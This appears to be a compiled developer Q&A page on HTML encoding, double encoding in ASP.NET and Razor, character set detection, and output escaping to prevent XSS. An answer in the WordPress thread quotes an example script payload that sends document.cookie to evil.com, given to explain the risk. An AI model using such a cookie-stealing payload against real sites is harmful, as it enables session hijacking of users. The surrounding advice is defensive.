Microsoft.Security.Application.Encoder.HtmlEncode preventing single quotes from rendering - asp.net

As a security measure we're using the Microsoft.Security.Application.Encoder.HtmlEncode method to encode and render values that have been stored in our database by various users.
We would like to allow users to use single quotes, but they are being encoded as &#39;.
Does anyone know of a safe way to allow single quotes to render but ensure the rest of the input is encoded? Is it just a case of replacing after the encoding has taken place? This approach seems a bit hacky.

I got to the bottom of this. The web control was also encoding the input data, so HTML encoding was taking place twice.
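A minimal sketch of the double-encoding failure, using Python's standard-library `html.escape` as a stand-in for `Encoder.HtmlEncode` (an assumption for illustration only; Python writes the apostrophe as `&#x27;` rather than `&#39;`, but the failure mode is the same). `render_once` and `render_twice` are hypothetical names, and `html.unescape` approximates what the browser does when it decodes the page:

```python
import html

def render_once(value: str) -> str:
    # Encode exactly once, at output time.
    return html.escape(value, quote=True)

def render_twice(value: str) -> str:
    # The bug: an explicit encode call, then a control that encodes again.
    return html.escape(render_once(value), quote=True)

text = "O'Brien's shop"
print(render_once(text))   # O&#x27;Brien&#x27;s shop
print(render_twice(text))  # O&amp;#x27;Brien&amp;#x27;s shop

# html.unescape approximates what the browser shows:
print(html.unescape(render_once(text)))   # O'Brien's shop
print(html.unescape(render_twice(text)))  # O&#x27;Brien&#x27;s shop
```

The fix is to remove one of the two encoding steps, not to patch the quotes back in after encoding.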

Related

Encoder.HtmlEncode encodes Farsi characters

I want to use the Microsoft AntiXss library for my project. When I use the Microsoft.Security.Application.Encoder.HtmlEncode(str) function to safely show some value in my web page, it encodes Farsi characters, which I consider to be safe. For instance, it converts لیست into numeric character references (one &#...; entity per letter). Am I using the wrong function? How can I safely print the user input in my page?
I'm currently using it like this:
<h2>@Encoder.HtmlEncode(ViewBag.UserInput)</h2>
I think I messed up! Razor views encode values unless you use @Html.Raw, right? Well, I encoded the string and Razor encoded it again. So in the end it was encoded twice, hence the weird-looking characters (Unicode values)!
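The same effect with Farsi text can be sketched as follows. `strict_encode` is a hypothetical stand-in for an encoder that writes every non-ASCII character as a decimal numeric character reference, and `razor_auto_encode` approximates Razor's automatic encoding with Python's `html.escape`; neither is the real AntiXss or Razor code:

```python
import html

def strict_encode(value: str) -> str:
    """Hypothetical stand-in: escape HTML specials, then write every
    non-ASCII character as a decimal numeric character reference."""
    escaped = html.escape(value, quote=True)
    return escaped.encode("ascii", "xmlcharrefreplace").decode("ascii")

def razor_auto_encode(value: str) -> str:
    """Rough approximation of Razor encoding an @-expression automatically."""
    return html.escape(value, quote=True)

farsi = "\u0644\u06cc\u0633\u062a"  # a 4-letter Farsi word

once = strict_encode(farsi)      # "&#1604;&#1740;&#1587;&#1578;"
twice = razor_auto_encode(once)  # "&amp;#1604;&amp;#1740;&amp;#1587;&amp;#1578;"

# html.unescape approximates what the browser displays:
assert html.unescape(once) == farsi  # encoded once: the Farsi word is shown
assert html.unescape(twice) == once  # encoded twice: the references show up as text
```

In Razor, writing `@ViewBag.UserInput` on its own should therefore be enough, since Razor already encodes it once.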
If your encoding (let's assume it's Unicode by default) supports Farsi, it is almost always safe to use Farsi in ASP.NET MVC without any additional effort.
First of all, escape-on-input is just wrong: you've taken some input and applied a transformation that is irrelevant to that data. It's generally wrong to encode your data immediately after you receive it from the user. You should store the data in its raw form in your database and encode it only when you display it to the user, according to the possible vulnerabilities of the current output. For example, the 'dangerous' HTML characters are not 'dangerous' for SQL or Android, and that's one of the main reasons why you shouldn't encode the data when you store it on the server. One more reason: when you HTML-encode a string, it can grow to 6-7 times as many characters (for example, when each Farsi letter becomes a numeric character reference), which can be a problem with string-length limits on the server. When you store the data in SQL Server, you should escape, validate and sanitize it only for that context and guard only against its vulnerabilities (like SQL injection).
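To put a number on the size argument, here is a minimal sketch, assuming an encoder that writes each non-ASCII character as a decimal numeric character reference and a hypothetical column limit of 20 characters. Each Farsi letter becomes a 7-character reference such as `&#1604;`, so a 4-letter word needs 28 characters once encoded:

```python
COLUMN_LIMIT = 20  # hypothetical NVARCHAR(20)-style column length

def numeric_ref_encode(value: str) -> str:
    # Hypothetical encoder: every non-ASCII character -> &#NNNN; (decimal).
    return value.encode("ascii", "xmlcharrefreplace").decode("ascii")

def fits(value: str) -> bool:
    return len(value) <= COLUMN_LIMIT

raw = "\u0644\u06cc\u0633\u062a"  # a 4-letter Farsi word
stored_encoded = numeric_ref_encode(raw)

print(len(raw), len(stored_encoded))    # 4 28
print(fits(raw), fits(stored_encoded))  # True False
```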
Now, for ASP.NET MVC and Razor you don't need to HTML-encode your strings yourself, because Razor does it by default unless you use Html.Raw(). Generally you should avoid Html.Raw() (or HTML-encode the value when you do use it). Also, if you double-encode your data, you'll end up with corrupted output :)
I hope this helps clear things up.

Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript; if you do not escape it, user-supplied JavaScript could be output to the page and executed (rather than simply displayed, as it is on Stack Overflow).
For example, if incoming data is saved into your database, it may still contain JavaScript code within the HTML, e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would redirect whichever user views the page to evil.com, passing along all of their cookies (which could include the user's session ID, allowing the attacker to hijack the session). However, this is often done more subtly so that users are not aware they are being attacked, for example by setting the URL of an <img> tag to pass along the cookies, or even by embedding a keylogger in the page.
Escaping needs to be done per output context, so it must be done at output time rather than at input time. Examples of output contexts are HTML, JavaScript, and CSS, and each has its own escaping (encoding) rules that must be followed to ensure your output is safe. For example, & in HTML is encoded as &amp;, whilst in JavaScript it should be encoded as \x26. This ensures the character is interpreted by the language as a literal rather than as a control character.
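To make the per-context point concrete, here is a minimal sketch with two encoders: `html.escape` for HTML text, and a hypothetical `encode_for_js_string` for values placed inside a quoted JavaScript string. The JavaScript encoder follows the OWASP approach of escaping every non-alphanumeric character; it is an illustration, not a vetted library. In WordPress itself you would reach for the platform's own functions such as `esc_html()` and `esc_js()`.

```python
import html

def encode_for_html(value: str) -> str:
    # HTML text or quoted-attribute context: entity-encode & < > " '.
    return html.escape(value, quote=True)

def encode_for_js_string(value: str) -> str:
    # Quoted JavaScript string context: keep ASCII letters/digits and escape
    # everything else as \xHH or \uHHHH, so nothing can end the string or
    # the surrounding <script> block.
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02x" % cp)
        elif cp < 0x10000:
            out.append("\\u%04x" % cp)
        else:
            # Outside the BMP: JavaScript strings use UTF-16 surrogate pairs.
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
    return "".join(out)

print(encode_for_html("Tom & Jerry"))       # Tom &amp; Jerry
print(encode_for_js_string("Tom & Jerry"))  # Tom\x20\x26\x20Jerry
```

The same `&` comes out as `&amp;` in the HTML context and as `\x26` in the JavaScript context, which is why one encoder cannot serve every output.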
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps ensure you're not letting someone inject anything unwanted into your page.
It's not as huge a risk as forgetting input validation (well, okay, maybe let's say "not as vulnerable to script kiddies, but still a huge risk if you piss off someone smart"), but the idea is that you want to prevent cross-site scripting. This article does a nice job of giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

How to detect wrong encoding declaration?

I am building an ASP.NET web service that loads other web pages and then hands them to clients.
I have been doing quite well with character-set handling: reading the meta tag from the HTML, then using that character set to read the file.
But nevertheless, some less-informed users just don't understand character sets. They declare a specific encoding, e.g. "gb2312", but in fact they are just using normal UTF-8. When I use gb2312 to decode the text, everything turns into a holy mess.
How can I detect whether the text has been decoded properly? I loaded that page into IE, which correctly uses UTF-8 to decode it. How does it achieve that?
Based on the byte order mark (BOM), when one is present, you can tell which encoding is used.
BOM and encoding
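A minimal BOM check might look like this (a sketch; `encoding_from_bom` is a hypothetical helper name). Many UTF-8 pages have no BOM at all, so a missing BOM tells you nothing and the declared charset or a detector is still needed:

```python
import codecs
from typing import Optional, Tuple

# Longest BOMs first: the UTF-32-LE BOM (FF FE 00 00) starts with the
# UTF-16-LE BOM (FF FE), so order matters.
_BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
]

def encoding_from_bom(data: bytes) -> Optional[Tuple[str, int]]:
    """Return (encoding, BOM length) if data starts with a known BOM, else None."""
    for bom, name in _BOMS:
        if data.startswith(bom):
            return name, len(bom)
    return None

raw = codecs.BOM_UTF8 + "<html>...</html>".encode("utf-8")
found = encoding_from_bom(raw)
if found:
    name, skip = found
    text = raw[skip:].decode(name)  # decode without the BOM itself
```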
If you want to detect the character set, you could use the C# port of Mozilla's character set detector.
CharDetSharp
If you want to make extra sure you are using the correct one, you could look for special characters that are not supposed to be there; a sequence like "óké" is not very likely to appear in real text. So you could look for such characters and, if you find them, try a different encoding/character set to process your file.
Actually it is really hard to make your application completely "fool-proof".
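One cheap heuristic, related to the "look for characters that shouldn't be there" idea but not the CharDetSharp algorithm, is to check whether the bytes are valid UTF-8 before trusting the declared charset: text in other multi-byte encodings such as GB2312 is unlikely to form valid UTF-8 by accident, especially in longer documents (short snippets can still fool it). A sketch, with `decode_html` as a hypothetical helper:

```python
from typing import Tuple

def decode_html(data: bytes, declared: str) -> Tuple[str, str]:
    """Hypothetical helper: returns (text, encoding actually used)."""
    if any(b >= 0x80 for b in data):
        try:
            # Strict decoding raises UnicodeDecodeError on any invalid sequence.
            return data.decode("utf-8"), "utf-8"
        except UnicodeDecodeError:
            pass
    # Pure ASCII, or not valid UTF-8: trust the declared charset.
    return data.decode(declared, errors="replace"), declared

page = '<meta charset="gb2312"><p>\u4e2d\u6587</p>'.encode("utf-8")
text, used = decode_html(page, "gb2312")
print(used)  # utf-8
```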

To HTMLENCODE or not to HTMLENCODE user input on web form (asp.net vb)

I have many params making up an insert form for example:
x.Parameters.AddWithValue("@city", City.Text)
I had a failed XSS attack on the site this morning, so I am trying to beef up security measures anyway.
Should I be adding my input params like this?
x.Parameters.AddWithValue("@city", HttpUtility.HtmlEncode(City.Text))
Is there anything else I should consider to avoid attacks?
Don't encode input. Do encode output. At some point in the future, you might decide you want to use the same data to produce PDF or a Word document (or something else), at which point you won't want it to be HTML.
When you are accepting data, it is just data.
When you are inserting data into a database, it needs to be converted to make sense for the database.
When you are inserting data into an HTML document, it needs to be converted to make sense for HTML.
… and so on.
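Applied to the question's insert form, the "encode output, not input" advice looks roughly like this. It is a Python/SQLite sketch rather than ADO.NET: the `?` placeholder plays the role of `@city` in `AddWithValue`, the table and function names are hypothetical, and `html.escape` stands in for the output encoder:

```python
import html
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE addresses (city TEXT)")

def save_city(city: str) -> None:
    # Store the raw value. The ? placeholder keeps it out of the SQL text,
    # which is what prevents SQL injection; no HTML encoding happens here.
    conn.execute("INSERT INTO addresses (city) VALUES (?)", (city,))

def render_cities() -> str:
    # Encode only when producing HTML, and only for the HTML context.
    rows = conn.execute("SELECT city FROM addresses ORDER BY rowid").fetchall()
    return "".join("<li>%s</li>" % html.escape(city) for (city,) in rows)

save_city("<script>alert(1)</script>")
save_city("Robert'); DROP TABLE addresses;--")
print(render_cities())
```

Because the database holds the raw text, the same rows can later feed a PDF or Word export with whatever encoding that format needs.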
I strongly recommend looking at the OWASP XSS Prevention Cheat Sheet. It classifies the different areas of an HTML document you can inject into and gives a recipe for encoding your output appropriately for each location.
Know that you can't just universally trust a function like htmlEncode() and expect it to be a magic pill for all ills. To quote from the linked OWASP document:
Why Can't I Just HTML Entity Encode Untrusted Data?
HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.
Take time to understand exactly how and why XSS works. Then just follow these 7 rules and you'll be safe.
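The URL case from the quote is easy to demonstrate: HTML entity encoding leaves `javascript:alert(1)` untouched, so it would still run if placed in an `href`. A minimal sketch with two hypothetical helpers: `safe_href` allows only absolute http/https URLs before attribute-encoding them, and `search_link` percent-encodes an untrusted value with `urllib.parse.quote` before it goes into a query string, then HTML-encodes the attribute:

```python
import html
from urllib.parse import quote, urlsplit

def safe_href(url: str) -> str:
    # Allow-list the scheme first; entity encoding alone would not stop
    # javascript: URLs, because they contain no HTML special characters.
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)

def search_link(term: str) -> str:
    # Untrusted data inside a query-string value: percent-encode it,
    # then HTML-encode the whole attribute value.
    value = html.escape(quote(term, safe=""), quote=True)
    return '<a href="/search?q=%s">search</a>' % value

print(html.escape("javascript:alert(1)"))  # javascript:alert(1)  (unchanged)
print(safe_href("javascript:alert(1)"))    # #
print(search_link('a&b "c"'))              # <a href="/search?q=a%26b%20%22c%22">search</a>
```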

Should I use HTML entities inside an ASP.NET page?

Inside an asp.net page, should I use
<html><title>My page’s title from México</title></html>
Or
<html><title>My page&rsquo;s title from M&eacute;xico</title></html>
Both examples produce the same output. Since ASP.NET encodes all my pages as UTF-8, there is no need to use HTML entities, is that right?
The ASCII table is a set of characters, arguably the first standardized set of characters, from the days when you could only spare 1 byte per character. http://asciitable.com/ But I did some looking around at the extended ASCII character set, and it appears that the character you are referencing is in it. So there really isn't a problem whichever way you choose to display your title.
My revised answer: go for the one that takes less space (i.e. the first one).
The second example will ensure compatibility with ASCII-only HTML transmission. So my vote is for the second example, so you don't have to ensure the HTML is output and encoded as UTF-8 all the way through all the proxy servers and any other kind of caching and translation that might occur.
You're correct: as long as there's Unicode at both ends of the pipe, it really doesn't matter. Personally, I would use the first simply because it's more readable.
And, honestly, Unicode has been widespread for some time. I personally believe it's time to leave behind anyone who can't handle UTF-8.
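A quick check of both points in this thread, assuming the second example spells ’ and é as the named entities `&rsquo;` and `&eacute;`: both forms decode to the same text, the entity form is pure ASCII, and the literal form is smaller when sent as UTF-8:

```python
import html

literal = "My page\u2019s title from M\u00e9xico"      # first example
entities = "My page&rsquo;s title from M&eacute;xico"  # second example (assumed entities)

assert html.unescape(entities) == literal  # same rendered text
assert entities.isascii()                  # survives ASCII-only transport

print(len(literal.encode("utf-8")))   # 30 bytes as UTF-8
print(len(entities.encode("ascii")))  # 40 bytes as ASCII with entities
```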

Resources